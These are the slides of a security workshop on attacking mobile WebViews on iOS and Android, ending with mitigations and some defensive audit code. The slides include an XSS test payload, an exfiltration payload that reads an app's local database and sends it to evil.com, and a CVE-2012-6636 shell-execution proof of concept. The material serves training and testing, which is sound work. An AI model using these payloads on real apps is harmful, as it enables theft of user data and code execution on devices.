Where’s My Browser?
Learn Hacking iOS and Android WebViews
David Turco (@endle__)
Jon Overgaard Christiansen
Workshop
DEF CON 26
9 Aug 2018
Who Are We?
David Turco (@endle__) Senior Security Consultant
Context Information Security
Jon Overgaard Christiansen Principal Consultant
Context Information Security
Context Information Security
• Leading cyber security consultancy
– Assurance
– Research
– Response
– Advisory
• Offices:
– United Kingdom
– Germany
– Australia
– United States
Who You Are
• Basic Web App Security
– <script>alert(1)</script>
– Web Developer Tools?
• Basic Mobile App Security
– APK or IPA?
– ADB
• Basic JavaScript/programming
– XMLHttpRequest?
– function lie(b) {return !b}
What You Have
• Best:
– Laptop with Mac OS X
– Xcode
– Android Studio + Chrome
• Alright:
– Laptop with Linux or Windows
– Android Studio + Chrome
– Virtualbox or VMWare
– A physical iOS Device
• Bad (but don't despair):
– No Mac OS X and no iOS Device
You Will
• Improve your Web and Mobile testing knowledge
• Learn Tools and Techniques for testing WebViews
• Practice Exploitation Techniques
• Become a better Web and Mobile App tester
Agenda
• Introduction to WebViews
• Where's My Browser? Mobile apps
• Attack surface
• Attacking WebViews - exfiltration of data
• Testing toolkit and techniques
• Practical 1
– Testing environment setup
– Data Exfiltration
• Attacking WebViews - JavaScript-Native bridges
• Practical 2
– JavaScript-Native bridges
• Mitigations
What are WebViews?
… in the beginning
What are WebViews?
Web 2.0
What are WebViews?
• Browsers embedded in mobile apps:
– Components part of UI Toolkit
– Display Web Pages
• Hybrid Apps
– Web technologies + Native mobile technologies
Where's My Browser?
It’s in your apps!
WebViews vs Mobile Browsers
• No information is shared between WebViews and the Mobile Browser!
• Developers now control the Browser ¯ \_(ツ)_/¯
Why Use WebViews? - PROS
• Reuse of existing web code in mobile apps
• Portability
• Developers familiar with web technologies
• Rapid patching of apps
Why Use WebViews? - CONS
• Look and feel
• Performance
• Challenges:
– Offline usage
– Integration with mobile capabilities
We Will Cover
• Bare functionality of:
– Android WebView
– iOS UIWebView (Deprecated)
– iOS WKWebView (iOS 8+)
We Will NOT Cover
• WebView-based frameworks:
– Apache Cordova
– Adobe PhoneGap
– …
• Desktop-based frameworks:
– Electron
– NW.js
– …
Where’s My Browser? - Mobile Apps
• Where's My Browser? Android
• Where's My Browser? iOS
Where’s My Browser? - Mobile Apps
• Android and iOS vulnerable applications to learn hacking WebViews
• Fully configurable WebViews:
– Use preconfigured vulnerable scenarios and tasks
– Explore WebViews on your own
• Open source (GPLv3.0)
• https://authenticationfailure.com/wmb
Where’s My Browser? – Android App
Where’s My Browser? – iOS App
Attacking WebViews
Run untrusted JavaScript inside the WebView
Injecting into WebViews
• Cross-Site Scripting (XSS)
<img src='x' onerror=alert('XSS')/>
• MiTM:
– Clear-text protocols
– SSL Stripping
Injecting into WebViews
• Mobile specific:
– More MiTM (e.g. misconfigured/disabled SSL certificate validation)
– Loading external pages in the WebView:
<a href="http://ev.il">Click Me!</a>
– URL schemes/Intents:
myapp://
https://myapp.com/
– Overwrite App files on shared storage
– …
JavaScript Support
• Android: OFF by default. Can be enabled with: setJavaScriptEnabled(true)
• iOS UIWebView: Always ON. Cannot be disabled
• iOS WKWebView: ON by default. Can be disabled with: webViewPreferences.javaScriptEnabled = false
JavaScript Test Payload
• WKWebViews don't display alert boxes!
• Bad payload:
<script>alert(1)</script>
• Better to use something more "visible":
<script>console.log("XSS")</script>
<marquee>XSS</marquee>
<h1>XSS</h1>
[...]
Exfiltration of Data
• App’s sandbox (credentials, sensitive info):
– Preferences (.xml, .plist)
– Local databases (SQLite)
– Cache files
• Device
– Pictures
Loading HTML data into WebViews
• Remote resource via URL
http://www.example.com
• Local resource on the filesystem
file:///file/path
• Directly load data (from String)
<h1>Hello World</h1>
Same-Origin Policy
• Origin:
• Same Origin Policy (SOP):
– Mechanism that restricts JavaScript running in the context of one origin to access objects from another origin
Same-Origin Policy
• Cross-Origin Resource Sharing (CORS)
– Relax the Same-Origin Policy:
Access-Control-Allow-Origin: http://www.example.com
Access-Control-Allow-Methods: POST, GET, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
• Find out more at:
– https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
Same-Origin Policy
• How does the Same-Origin policy apply to:
– local resource on filesystem
file:///file/path
– data loaded directly into WebView
<h1>Hello World</h1>
Access from File - iOS UIWebView
• File access is enabled by default.
– Can’t be disabled
• Same-Origin policy disabled from file://
– Files can access all file:// resources
– Files can access resources from other schemes (e.g. https) “with credentials”
Exfiltration Payload
xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
    if (this.readyState == 4) {
        img = new Image();
        img.src = "http://www.evil.com/?data="
            + encodeURIComponent(this.responseText)
    }
}
xhttp.open("GET", "../path/to/database");
xhttp.send();
Access from File - iOS WKWebView
• File access enabled by default
• Access to other files is not allowed
– Can be enabled by setting an undocumented property:
wkWebViewPreferences.setValue("Yes", forKey: "allowFileAccessFromFileURLs")
• Same-origin and CORS are honoured
– Cannot be changed
Access from File - Android
• File access enabled by default
– Can be disabled with:
webViewSettings.setAllowFileAccess(false);
• Access to other files disabled by default since Android 4.1 Jelly Bean
– Can be enabled with:
webViewSettings.setAllowFileAccessFromFileURLs(true);
Access from File - Android
• Access to other URI schemes honours same-origin policy and CORS by default (since Android 4.1 Jelly Bean)
– The Universal Access option disables the same-origin policy and results in credentialed Universal XSS from file:
webViewSettings.setAllowUniversalAccessFromFileURLs(true);
Access from File - Comparison
• Access to file:
– iOS UIWebView: Always ON. Can’t disable
– iOS WKWebView: Always ON. Can’t disable
– Android: ON by default. Can be disabled with: setAllowFileAccess(false)
• Access to files from file:
– iOS UIWebView: Always ON. Can’t disable
– iOS WKWebView: OFF by default. Enable via undocumented property: allowFileAccessFromFileURLs
– Android: OFF by default since Android 4.1. Can be enabled with: setAllowFileAccessFromFileURLs(true)
• Universal access from file (Same-origin policy disabled):
– iOS UIWebView: Always ON. Can’t disable
– iOS WKWebView: Always OFF
– Android: OFF by default since Android 4.1. Can be enabled with: setAllowUniversalAccessFromFileURLs(true)
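A defender-side check built from the comparison above, as an added example that is not part of the original slides: it scans Java or Swift source text for the WebView settings the slides name and reports the ones that widen file or cross-origin access. The rule ids, severities and the two sample snippets are constructed for illustration.

```javascript
// Added example (not from the workshop material): static audit of WebView
// settings in app source text. Rule ids and severities are assumptions.
const RULES = [
  { id: "android-universal-from-file", severity: "critical",
    pattern: /\.setAllowUniversalAccessFromFileURLs\(\s*true\s*\)/,
    note: "same-origin policy disabled for file: content" },
  { id: "android-file-from-file", severity: "high",
    pattern: /\.setAllowFileAccessFromFileURLs\(\s*true\s*\)/,
    note: "file: pages may read other files (OFF by default since Android 4.1)" },
  { id: "ios-wk-file-from-file", severity: "high",
    pattern: /forKey:\s*"allowFileAccessFromFileURLs"/,
    note: "undocumented WKWebView property enabling access to other files" },
  { id: "ios-uiwebview", severity: "high",
    pattern: /\bUIWebView\b/,
    note: "UIWebView: file and universal access always ON, cannot be disabled" },
  { id: "android-debugging", severity: "medium",
    pattern: /\.setWebContentsDebuggingEnabled\(\s*true\s*\)/,
    note: "WebView remote debugging enabled" },
  { id: "android-js-enabled", severity: "info",
    pattern: /\.setJavaScriptEnabled\(\s*true\s*\)/,
    note: "JavaScript is OFF by default on Android; this call enables it" },
];

const SEVERITY_ORDER = { critical: 0, high: 1, medium: 2, info: 3 };

// Blank out // and /* */ comments but keep double-quoted strings and newlines,
// so commented-out calls are ignored and reported line numbers stay correct.
// Limitation: Java char literals such as '"' are not handled.
function stripComments(text) {
  const token = /"(?:\\.|[^"\\\n])*"|\/\*[\s\S]*?\*\/|\/\/[^\n]*/g;
  return text.replace(token, (m) =>
    m[0] === '"' ? m : m.replace(/[^\n]/g, " "));
}

// Returns findings sorted by severity, then by line number.
function auditSource(file, text) {
  const lines = stripComments(text).split("\n");
  const findings = [];
  lines.forEach((line, i) => {
    for (const rule of RULES) {
      if (rule.pattern.test(line)) {
        findings.push({ file, line: i + 1, id: rule.id,
                        severity: rule.severity, note: rule.note });
      }
    }
  });
  // Absence check: Android file access stays ON unless explicitly disabled,
  // so a configured WebView without setAllowFileAccess(false) is reported.
  const settingsLine = lines.findIndex((l) => /\.getSettings\(\)/.test(l));
  const disabled = lines.some((l) => /\.setAllowFileAccess\(\s*false\s*\)/.test(l));
  if (settingsLine !== -1 && !disabled) {
    findings.push({ file, line: settingsLine + 1,
                    id: "android-file-access-default-on", severity: "medium",
                    note: "file access is ON by default and never disabled" });
  }
  return findings.sort((a, b) =>
    SEVERITY_ORDER[a.severity] - SEVERITY_ORDER[b.severity] || a.line - b.line);
}

// Constructed sample input (not taken from any real app).
const SAMPLE_JAVA = [
  'import android.webkit.WebView;',
  'class Main {',
  '  void setup(WebView webView) {',
  '    WebSettings s = webView.getSettings();',
  '    s.setJavaScriptEnabled(true);',
  '    // s.setAllowUniversalAccessFromFileURLs(true);',
  '    s.setAllowFileAccessFromFileURLs(true);',
  '    webView.loadUrl("file:///android_asset/index.html");',
  '  }',
  '}',
].join("\n");

// Constructed sample input (not taken from any real app).
const SAMPLE_SWIFT = [
  'let prefs = WKPreferences()',
  'prefs.javaScriptEnabled = false',
  'prefs.setValue("Yes", forKey: "allowFileAccessFromFileURLs")',
  'let legacy = UIWebView(frame: .zero)',
].join("\n");

for (const f of [...auditSource("Main.java", SAMPLE_JAVA),
                 ...auditSource("Browser.swift", SAMPLE_SWIFT)]) {
  console.log(`${f.severity.toUpperCase()} ${f.file}:${f.line} ${f.id} - ${f.note}`);
}
```

The commented-out universal-access call on line 6 of the Java sample is not reported, while the missing `setAllowFileAccess(false)` is.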
Loading data Programmatically
Load HTML data from String:
• Android:
void loadData(String data, String mimeType, String encoding)
void loadDataWithBaseURL(String baseUrl, String data, String mimeType, String encoding, String historyUrl)
• iOS UIWebView:
func loadHTMLString(_ string: String, baseURL: URL?)
• iOS WKWebView:
func loadHTMLString(_ string: String, baseURL: URL?) -> WKNavigation?
Loading data Programmatically
• iOS UIWebViews:
– Allow access to file:// resources
– Same-Origin Policy is disabled
– CORS headers are not honoured
• Android and iOS WKWebView behave safely
• Effective origin when baseURL is NULL:
– Android: null
– iOS UIWebView: applewebdata://CBCF4B25-625E-4069-87F4-0CEC46ECE6B3
– iOS WKWebView: null
Toolkit and Testing Techniques
• Intercepting proxy
• Remote debugging:
– Chrome > Android WebViews
  • What if remote debugging is disabled?
– Safari > iOS WebViews
– Chrome >>>> iOS WebViews
  • What if remote debugging is disabled?
Web Developer Tools
• Use the browser on PC/Mac to debug WebViews on Android and iOS
– Chrome -> Android WebViews
– Safari -> iOS WebViews
Remote Debugging Android
• Prerequisites
– Enable developer mode and Android Debug Bridge (ADB) (physical device only)
– Application needs to have WebView debugging enabled:
webView.setWebContentsDebuggingEnabled(true);
  • Different from the debugging option in the Android manifest!!!
Remote Debugging Android - Chrome
• In Google Chrome visit the URL:
– chrome://inspect
Remote Debugging Android
• What if the application does not have remote debugging enabled?
– Instrumentation at runtime:
  • Frida
– Patch the application:
  • SMALI magic, e.g. using apktool
    https://ibotpeaches.github.io/Apktool/
– JavaScript-based remote debuggers:
  • WEINRE (…stay tuned)
Frida
• Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.
• Cross-platform:
– Android/iOS
– Linux/MacOS X/Windows
https://www.frida.re/
https://codeshare.frida.re/
Remote Debugging Android – Frida
https://gist.github.com/authenticationfailure/97c74d5475707598e6478395bc9bc9d6

    Java.perform(function() {
        Java.choose("android.webkit.WebView", {
            "onMatch": function(o) {
                try {
                    var Runnable = Java.use('java.lang.Runnable');
                    var MyRunnable = Java.registerClass({
                        name: 'com.example.MyRunnable',
                        implements: [Runnable],
                        methods: {
                            'run': function() {
                                o.setWebContentsDebuggingEnabled(true);
                                console.log('WebView Debugging should be enabled');
                            }
                        }
                    });
                    var runnable = MyRunnable.$new();
                    o.post(runnable);
                }
                catch (e) {
                    console.log("Execution failed " + e.message);
                }
            },
            "onComplete": function() {
                console.log("Execution completed")
            }
        })
    });
Remote Debugging iOS
• Prerequisites:
– Enable "Web Inspector" on the device:
  • Settings > Safari > Advanced > Web Inspector
– Enable Safari's Developer Options on Mac OS X
– Can be fussy with Safari version vs iOS version.
– Requires that the app is "Built for testing"
Remote Debugging iOS - Safari
1. In Safari select Develop > YourName's iPhone
2. Then select the WebView to inspect:
Remote Debugging via iOS WebKit Adapter
• What if you don’t have a Mac?
• Use "Remotedebug iOS WebKit Adapter":
– Remotely debug iDevices from Linux and Windows using Chrome
– https://github.com/RemoteDebug/remotedebug-ios-webkit-adapter
Remote Debugging via iOS WebKit Adapter
• Preinstalled in the Workshop Virtual Machine
• Installation steps documented in:
– WMB_Workshop_Remote_Debugging_WebViews_v1.0.pdf
• Can be flaky. Try to:
– Refresh the page
– Disconnect and reconnect the developer tools
– Stop and start the adapter
– Disconnect and reconnect the device
Remote Debugging via iOS WebKit Adapter
Using the Workshop VM:
1. Connect the iDevice to the VM
2. Make sure the VM can see the device with:
idevicepair pair
ideviceinfo
3. Start "Remotedebug iOS Webkit Adapter" with:
remotedebug_ios_webkit_adapter --port=9000
4. Instruct Chrome to connect to the adapter on port 9000
5. Select the WebView to inspect from the list
Remote Debugging iOS
• What if the app is NOT "Built for testing"?
– Use JavaScript-based remote debuggers:
• WEINRE
Remote Debugging with WEINRE
• WEb INspector REmote
• JavaScript-based Web Inspector
• No Longer Supported
• Limited functionality
https://people.apache.org/~pmuellr/weinre/docs/latest/Home.html
https://github.com/apache/cordova-weinre
Remote Debugging with WEINRE
1. Install using npm:
    npm install -g weinre
2. Start WEINRE:
    weinre    # by default binds to localhost:8080
    weinre --boundHost -all- --httpPort 8080
3. Then visit: http://localhost:8080/ and follow the onscreen instructions.
Remote Debugging with WEINRE
• Modify HTML source and add:
    <script src="http://weinrehost:8080/target/target-script-min.js#anonymous"></script>
• Load WEINRE's script dynamically with the following JavaScript code:
    var script = document.createElement('script');
    script.onload = function () { console.log("WEINRE script loaded"); };
    script.src = "http://weinrehost:8080/target/target-script-min.js#anonymous";
    document.head.appendChild(script);
Practical 1 - Exfiltration
WMB_Practical_1_-_Exfiltration.pdf
– Set up testing environment:
• Install apps on Android and iOS
• Enable remote debugging
– Exfiltration exercises:
• Android (scenarios 1 and 4)
• iOS UIWebView (scenarios 1 and 2)
• iOS WKWebView (scenarios 1 and 2)
JavaScript-Native Bridge
• Need to communicate between JavaScript and native code
– Access keychain to retrieve auth tokens
– Access camera and accelerometers
– …
JavaScript-Native Bridge
• Android
– Invoking JavaScript from native
– Invoking native code from JavaScript
Android – Native to JavaScript
Invoke JavaScript from Java:
webView.evaluateJavascript("(function() { return 'Hello'; })();",
        new ValueCallback<String>() {
    @Override
    public void onReceiveValue(String s) {
        // s="Hello"
    }
});
Android – JavaScript to Native
Expose Java methods to JavaScript via addJavascriptInterface:
public class JavascriptBridge {
    @JavascriptInterface
    public String getGreetingMessage() {
        return "Hello World!";
    }
}
webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge");
Android – JavaScript to Native
Native methods are invoked from JavaScript using:
message = javascriptBridge.getGreetingMessage()
Android – CVE-2012-6636
• Remote code execution via JavaScriptInterface
• Android <= 4.1 (JELLY_BEAN, API 16)
• Access Java classes/methods via JavaScript using reflection
Android – CVE-2012-6636
Proof of concept exploit:
cmd = ['/system/bin/sh', '-c',
'echo \"Hello World\" > /mnt/sdcard/hello.txt']
runtimeClass = javascriptBridge.getClass().forName('java.lang.Runtime')
runtime = runtimeClass.getMethod('getRuntime',null).invoke(null,null)
runtime.exec(cmd)
Android – @JavascriptInterface
• @JavascriptInterface annotation is required for exported methods from Android 4.2 (JELLY_BEAN_MR1, API 17) and above
– Introduced to fix CVE-2012-6636
• When testing, decompile the App (e.g. using jadx) and search for @JavascriptInterface.
– Works with obfuscated source code!
• Methods are enumerable from JavaScript from Android 5.0 (LOLLIPOP_MR1, API 22) and above.
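The search described above can be scripted when reviewing an app's bridge surface. The following is an added example, not part of the workshop material: it scans decompiled Java text for @JavascriptInterface methods and addJavascriptInterface registrations, then joins them into a map of what each JavaScript object can call. The sample sources, file paths and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of jadx-style output (not taken from the workshop app).
SAMPLE_SOURCES = {
    "com/example/a/b.java": '''
package com.example.a;
import android.webkit.JavascriptInterface;
public final class b {
    @JavascriptInterface
    public String getGreetingMessage() { return "Hello World!"; }
    @JavascriptInterface
    public final void a(String str, int i) { }
    public void notExported() { }
}
''',
    "com/example/MainActivity.java": '''
package com.example;
public class MainActivity extends Activity {
    void setup(WebView webView) {
        webView.addJavascriptInterface(new com.example.a.b(), "javascriptBridge");
    }
}
''',
}

PACKAGE_RE = re.compile(r"^\s*package\s+([\w.]+)\s*;", re.M)
CLASS_RE = re.compile(r"\bclass\s+(\w+)")
# Annotation, optional modifiers, then "ReturnType name(params)".
EXPORT_RE = re.compile(
    r"@JavascriptInterface\s+(?:(?:public|final|static|synchronized)\s+)*"
    r"([\w.<>\[\]]+)\s+(\w+)\s*\(([^)]*)\)")
# addJavascriptInterface(new Some.Class(...), "jsName") or (someField, "jsName")
REGISTER_RE = re.compile(
    r'\.addJavascriptInterface\(\s*(?:new\s+([\w.]+)\s*\([^)]*\)|([\w.]+))'
    r'\s*,\s*"([^"]+)"\s*\)')

def exported_methods(sources):
    """Map fully qualified class name -> signatures annotated @JavascriptInterface."""
    found = defaultdict(list)
    for text in sources.values():
        pkg, cls = PACKAGE_RE.search(text), CLASS_RE.search(text)
        if not cls:
            continue
        # Assumption: one top-level class per file, as jadx emits.
        fqcn = (pkg.group(1) + "." if pkg else "") + cls.group(1)
        for ret, name, params in EXPORT_RE.findall(text):
            found[fqcn].append(f"{ret} {name}({' '.join(params.split())})")
    return dict(found)

def registrations(sources):
    """List (js_object_name, class_or_expression, file) per addJavascriptInterface call."""
    return [(js_name, new_cls or expr, path)
            for path, text in sources.items()
            for new_cls, expr, js_name in REGISTER_RE.findall(text)]

def bridge_surface(sources):
    """Join both views: JavaScript object name -> native methods it can call."""
    methods = exported_methods(sources)
    surface = {}
    for js_name, cls, _ in registrations(sources):
        surface.setdefault(js_name, []).extend(
            sig for fqcn, sigs in methods.items()
            if fqcn == cls or fqcn.endswith("." + cls) for sig in sigs)
    return surface

if __name__ == "__main__":
    for js_name, sigs in bridge_surface(SAMPLE_SOURCES).items():
        print(js_name, "->", sigs or "class not resolved, review by hand")
```

A registration whose class cannot be resolved (for example an object passed in through a field) maps to an empty list and needs a manual look.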
JavaScript-Native Bridge
• iOS UIWebView
– Invoking JavaScript from native
– Invoking native code from JavaScript
• No inbuilt mechanism in UIWebView
• Workaround based on custom URIs
iOS – UIWebView Native to JavaScript
Call JavaScript via stringByEvaluatingJavaScript:
let javaScriptCode = "myJavaScriptFunction('Hello')"
let result = uiWebView.stringByEvaluatingJavaScript(from: javaScriptCode)
Follow good practice for XSS prevention
iOS – UIWebView JavaScript to Native
JavaScript: Define callback function
JavaScript: Navigate to custom URI: javascriptbridge://getPassword/
Native Code: Parse URI, extract parameters
Native Code: Invoke JavaScript callback
JavaScript: Callback function reads result from parameters
iOS – UIWebView JavaScript to Native
JavaScript Code to invoke native functionality via custom URIs and call back functions:
function getPasswordCallBack(password) {
// Do something with password
console.log(password)
}
document.location = "javascriptbridge://getPassword/"
iOS – UIWebView JavaScript to Native
Native Code to handle calls from JavaScript via custom URIs (Swift):
func webView(_ webView: UIWebView, shouldStartLoadWith request: URLRequest,
             navigationType: UIWebViewNavigationType) -> Bool {
    if request.url?.scheme == "javascriptbridge" &&
        request.url?.host == "getPassword" {
        let javaScriptCallBack = "getPasswordCallBack('Password1')"
        uiWebView.stringByEvaluatingJavaScript(from: javaScriptCallBack)
        return false // Prevent navigation to URI
    }
    return true
}
JavaScript-Native Bridge
• iOS WKWebView
– Invoking JavaScript from native
– Invoking native code from JavaScript
• Inbuilt functionality
• Can still use custom URI workaround
iOS – WKWebView Native to JavaScript
Native code to invoke JavaScript code:
let javaScriptCode = "myJavaScriptFunction('Hello World')"
wkWebView.evaluateJavaScript(javaScriptCode, completionHandler: nil)
iOS – WKWebView JavaScript to Native
Native code to handle calls from JavaScript via WKScriptMessageHandler:
class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler {
    func userContentController(_ userContentController: WKUserContentController,
                               didReceive message: WKScriptMessage) {
        let messageArray = message.body as! [String]
        if messageArray[0] == "getPassword" {
            let jsCallBack = "getPasswordCallBack('Password1')"
            message.webView?.evaluateJavaScript(jsCallBack, completionHandler: nil)
        }
    }
}
let messageHandler = JavaScriptBridgeMessageHandler()
wkWVConfiguration.userContentController.add(messageHandler, name: "javaScriptBridge")
iOS – WKWebView JavaScript to Native
JavaScript Code to invoke native functionality via WKScriptMessageHandler:
function getPasswordCallBack(password) {
// Do something with password
console.log(password)
}
window.webkit.messageHandlers.javaScriptBridge.postMessage(["getPassword"]);
iOS – JavaScript to Native
• How to identify exposed functionality:
– Reverse engineer App
– Reverse App’s JavaScript code
– Reverse Android’s version of the App
– Trace calls at runtime using Frida
– …
Trace UIWebView Methods with Frida (1/2)
$ frida --codeshare mrmacete/objc-method-observer -n WheresMyBrowser
     ____
    / _  |   Frida 11.0.12 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at http://www.frida.re/docs/home/
[Local::WheresMyBrowser]-> observeSomething("*[* webView:shouldStartLoadWithRequest*]");
[Local::WheresMyBrowser]-> observeSomething("*[* stringByEvaluatingJavaScript*]");
Trace UIWebView Methods with Frida (2/2)
(0x7fe22142d760) -[UIWebView stringByEvaluatingJavaScriptFromString:]
stringByEvaluatingJavaScriptFromString: javascriptBridgeCallBack('addNumbers','11.0')
0x1098c18b6 WheresMyBrowser!_T015WheresMyBrowser19UIWebViewControllerC03webE0SbSo0dE0C_10Foundation10URLRequestV19shouldStartLoadWithSC0dE14NavigationTypeO010navigationO0tF
[...]
RET:
(0x7fe22140f0d0) -[WheresMyBrowser.UIWebViewController webView:shouldStartLoadWithRequest:navigationType:]
webView: <UIWebView: 0x7fe22142d760; frame = (0 126; 375 492); autoresize = RM+BM; layer = <CALayer: 0x600000237e40>>
shouldStartLoadWithRequest: <NSMutableURLRequest: 0x600000218ea0> { URL: javascriptbridge://addNumbers/5/6 }
navigationType: 0x5
0x10b18b074 UIKit!-[UIWebView webView:decidePolicyForNavigationAction:request:frame:decisionListener:]
[...]
RET: nil
Trace WKWebView Methods with Frida (1/2)
$ frida --codeshare mrmacete/objc-method-observer -n WheresMyBrowser
     ____
    / _  |   Frida 11.0.12 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at http://www.frida.re/docs/home/
[Local::WheresMyBrowser]-> observeSomething("*[WKScriptMessage body]");
[Local::WheresMyBrowser]-> observeSomething("*[* evaluateJavaScript*]");
Trace WKWebView Methods with Frida (2/2)
(0x7fe22199a800) -[WKWebView evaluateJavaScript:completionHandler:]
evaluateJavaScript: javascriptBridgeCallBack('multiplyNumbers','144.0')
completionHandler: nil
0x1098a9340 WheresMyBrowser!_T015WheresMyBrowser30JavaScriptBridgeMessageHandlerC21userContentControllerySo06WKUserjK0C_So08WKScriptG0C10didReceivetF JavaScriptBridgeMessageHandler.swift:0
[...]
RET: 0x11dcd3008
(0x60000025d610) -[WKScriptMessage body]
0x1098a93b3 WheresMyBrowser!_T015WheresMyBrowser30JavaScriptBridgeMessageHandlerC21userContentControllerySo06WKUserjK0C_So08WKScriptG0C10didReceivetF JavaScriptBridgeMessageHandler.swift:47
[...]
RET: ( multiplyNumbers, 32, "4.5" )
Practical 2 - JavaScript-Native Bridge
• WMB_Practical_2_-_JavaScript-Native_Bridge.pdf
• JavaScript-Native Bridge exercises:
– Android (scenarios 2 and 3)
– iOS UIWebView (scenarios 3 and 4)
– iOS WKWebView (scenario 3)
Mitigations - Avoid WebViews
• Avoid using WebViews for simple HTML:
– Use TextViews instead
• Open websites externally in the Mobile Browser
Mitigations - Using WebViews (1/2)
• Disable JavaScript, where possible
• Prefer WKWebView to UIWebViews on iOS
• Restrict your app to Android 4.2+, better 5+
• Specify a "safe" base URL when loading data programmatically
• Follow good practice for XSS prevention
Mitigations - Using WebViews (2/2)
• Always use TLS (enforce at app/platform level)
• Be frugal exposing native functionality
• Open links externally
• Disable remote debugging on Android
• Treat JavaScript-Native bridges as an untrusted boundary. Implement strict validation.
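One way to apply strict validation to the two bridge styles shown earlier, written as a Python model so the checks can be run off-device (an added example, not code from the workshop apps): each call is matched against an allowlist of actions, argument count and format are checked, and the callback is built with JSON encoding instead of string concatenation. `TRUSTED_ORIGINS`, the action table and the function names are assumptions; the action and callback names reuse those visible in the Frida traces.

```python
import json
import re
from urllib.parse import urlsplit

BRIDGE_SCHEME = "javascriptbridge"
TRUSTED_ORIGINS = {"https://app.example.com"}  # hypothetical origin allowlist
NUMBER_RE = re.compile(r"-?[0-9]{1,9}(?:\.[0-9]{1,6})?")


class BridgeRejected(Exception):
    """Raised for any call that is not exactly what the bridge expects."""


def _number(value):
    # Arguments arrive as strings (URI path) or JSON values (WKWebView message).
    if isinstance(value, bool) or not isinstance(value, (int, float, str)):
        raise BridgeRejected(f"unsupported argument type: {type(value).__name__}")
    if not NUMBER_RE.fullmatch(str(value)):
        raise BridgeRejected(f"not a bounded decimal number: {value!r}")
    return float(value)


# Allowlist: action name -> (one validator per argument, handler).
ACTIONS = {
    "addNumbers": ((_number, _number), lambda a, b: a + b),
    "multiplyNumbers": ((_number, _number), lambda a, b: a * b),
}


def dispatch(page_origin, action, raw_args):
    """Validate one bridge call; return the JavaScript callback to evaluate."""
    if page_origin not in TRUSTED_ORIGINS:
        raise BridgeRejected(f"untrusted page origin: {page_origin!r}")
    if not isinstance(action, str) or action not in ACTIONS:
        raise BridgeRejected(f"unknown action: {action!r}")
    validators, handler = ACTIONS[action]
    if len(raw_args) != len(validators):
        raise BridgeRejected(f"{action} expects {len(validators)} arguments")
    result = handler(*(check(arg) for check, arg in zip(validators, raw_args)))
    # json.dumps emits valid JavaScript string literals, so a value cannot
    # break out of the callback's argument list.
    return f"javascriptBridgeCallBack({json.dumps(action)},{json.dumps(str(result))})"


def from_custom_uri(page_origin, uri):
    """UIWebView style: javascriptbridge://<action>/<arg>/<arg>"""
    try:
        parts = urlsplit(uri)
    except ValueError as exc:
        raise BridgeRejected(f"unparsable URI: {uri!r}") from exc
    if parts.scheme != BRIDGE_SCHEME or "?" in uri or "#" in uri:
        raise BridgeRejected(f"not a plain bridge URI: {uri!r}")
    path = parts.path[1:] if parts.path.startswith("/") else parts.path
    # netloc (unlike hostname) keeps case, userinfo and port, so anything
    # other than a bare action name fails the allowlist lookup.
    return dispatch(page_origin, parts.netloc, path.split("/") if path else [])


def from_script_message(page_origin, body):
    """WKWebView style: message body is [action, arg, ...]."""
    if not isinstance(body, list) or not body:
        raise BridgeRejected("message body must be a non-empty array")
    return dispatch(page_origin, body[0], body[1:])


if __name__ == "__main__":
    print(from_custom_uri("https://app.example.com", "javascriptbridge://addNumbers/5/6"))
```

In an app the same checks belong in the native handler (shouldStartLoadWith, userContentController or the @JavascriptInterface method), with the page origin taken from the WebView rather than from the caller.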
Mitigations - Damage Control
• Implement strict Content Security Policy (CSP) (Using HTTP headers or META tags)
• Encrypt sensitive data on storage
The End. Thank You!
Instructors:
David Turco (@endle__)
Jon Overgaard Christiansen
Where's My Browser Project Website: https://authenticationfailure.com/wmb
Where's My Browser GitHub Repository:
https://github.com/authenticationfailure/WheresMyBrowser.Android
https://github.com/authenticationfailure/WheresMyBrowser.iOS
Context Information Security: https://www.contextis.com/